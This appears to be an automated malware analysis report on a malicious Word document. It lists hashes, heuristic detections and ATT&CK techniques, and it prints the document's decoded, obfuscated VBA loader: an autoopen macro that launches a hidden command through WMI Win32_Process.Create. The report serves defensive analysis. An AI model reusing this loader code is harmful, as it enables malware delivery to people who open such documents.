Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 78ccbb54d3dab7d0…

MALICIOUS

Office (OLE)

134.0 KB Created: 2019-09-24 06:41:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: ad380f257f4c457f2037c06309e3acbd SHA-1: 67d2f6119b128e3aa7df01926e0973456e776b03 SHA-256: 78ccbb54d3dab7d0568b76caa8d3a94b26d4c159c36e93061585b2d43a7196c9
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-exec loader that uses CreateObject and execution sinks, suggesting it's designed to run code. The presence of a VBA macro named 'macros.bas' and the 'autoopen' marker strongly suggest this macro is intended to execute automatically upon opening the document, likely to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Malware.Generic-7178224-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-7178224-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9912 bytes
SHA-256: 3a590130416c2ddec491bdb9d5593d4a6bc4a2e4e94499057153ad4a7e7681c8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kkmjww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox"
Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox"
Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox"
Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox"
Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox"
Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox"
Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox"

Attribute VB_Name = "Shqkwv"
Private Const Brjjiv As String = "Xnp6q4q"
Private Const Tpvkdl As String = "Itj64o"
Private Wvhidrap      As String
Private J5hw3qk      As Boolean
Private Pjiv7b      As Integer
Private Declare Sub Ffqczj Lib "V0rdjf" ()
Private Declare Sub H61ubr Lib "P44ci1" ()
Function Nnazwms()
Dim pDBXVeleSn95, yALtDyQJVU12 As Integer
yALtDyQJVU12 = 8541
For pDBXVeleSn95 = 0 To 88
yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95
DoEvents
Next pDBXVeleSn95
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer
mxBXzQQtbS22 = 8263
For kmJQTFcJOI63 = 0 To 96
mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63
DoEvents
Next kmJQTFcJOI63
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
Function Ti1iz0cl(E6pinh)
Dim bIEeUYPMQL63, cfibQITmka13 As Integer
cfibQITmka13 = 5323
For bIEeUYPMQL63 = 0 To 25
cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63
DoEvents
Next bIEeUYPMQL63
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function


Attribute VB_Name = "S8u1adw"
Private Const S3vczf As String = "Z918ur1p"
Private Const Qz0su2 As String = "Y60rrn"
Private Pzkb0pl      As String
Private C2ijjt      As Boolean
Private Ypdfc9tz      As Integer
Private Declare Sub Gpzhdb Lib "J61dhb" ()
Private Declare Sub R1uiqcwt Lib "Y72pqba" ()
Sub autoopen()
Dim SQZiGxarup86, NxIwNiZDoj34 As Integer
NxIwNiZDoj34 = 6788
For SQZiGxarup86 = 0 To 17
NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86
DoEvents
Next SQZiGxarup86
Nnazwms
End Sub
Function Yh3wpj()
Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer
OnSlpvPgmm82 = 4395
For TYWXvZKgog25 = 0 To 36
OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25
DoEvents
Next TYWXvZKgog25
Z7bap4$ = N7oo7a3p + Y83nojt
Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer
TyvIxAOXdA51 = 9313
For YIqBrnoQql13 = 0 To 65
TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13
DoEvents
Next YIqBrnoQql13
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function


' Processing file: /opt/analyzer/scan_staging/5ac8f439e81c4ba78cebc08a75f5b427.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Kkmjww - 3295 bytes
' Macros/VBA/Shqkwv - 3266 bytes

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.